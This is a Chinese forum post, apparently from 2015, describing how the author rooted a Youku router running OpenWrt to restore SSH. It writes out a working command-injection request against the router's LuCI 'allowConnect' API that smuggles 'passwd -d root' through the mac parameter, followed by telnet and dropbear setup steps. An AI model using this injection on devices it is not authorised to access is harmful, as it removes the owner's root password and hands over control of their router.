路由宝到手后，连TTL，启动信息说明系统用的是openwrt，但一进内核，TTL就不在输出。还关闭了SSH和Telnet。就让软件工程师用软件的方式来搞定它！摸索的过程很漫长，本文将直接总结开启SSH的步骤

固件解包后获得信息：

系统用openwrt，sshd或者dropbear 已被优酷直接删除，telnet还在。

opkg的地址被指向本地IP。

系统是openwrt，用的LUCI，那就有机会注入脚本。

果然

漏洞.PNG (90.37 KB, 下载次数: 650)

2015-3-14 20:21 上传

允许设备联网这个接口，没有对MAC这个参数做过滤，可以构造命令，做任何想做的事情。

telnet连不上，是因为openwrt只会在root账户没有密码的情况下才允许telnet连接。

所以，构造请求 ;passwd -d root;

http://192.168.11.1/cgi-bin/luci/;stok=6162fd66813c8381229b2fe99993d61e/api/devices/allowConnect?mac=%3Bpasswd%20-d%20root%3B

删除 root密码

telnet 连接 成功

telnet.PNG (52.12 KB, 下载次数: 681)

2015-3-14 20:22 上传

修改opkg.conf，更换openwrt源

opkgconf.PNG (54.71 KB, 下载次数: 686)

2015-3-14 20:22 上传

更新opkg  opkg update

安装dropbear opkg install dropbear

设置 dropbear 自启动 修改 /etc/rc.local 添加一行 /usr/sbin/dropbear

本来可以执行 /etc/init.d/dropbear rc.common但报错了，不管了，有空再看，先粗暴的直接执行命令。

自启动.PNG (50.54 KB, 下载次数: 677)

2015-3-14 20:22 上传

查看一下 iptables，确认22 端口开放；

重启，发现ssh可以连了。

那就再telnet上去，设置root密码。

修改密码.PNG (60.07 KB, 下载次数: 688)

2015-3-14 20:21 上传

SSH连接成功

ssh成功.PNG (58.74 KB, 下载次数: 653)

2015-3-14 20:22 上传

搞定收工。

改日再折腾 TTL 输出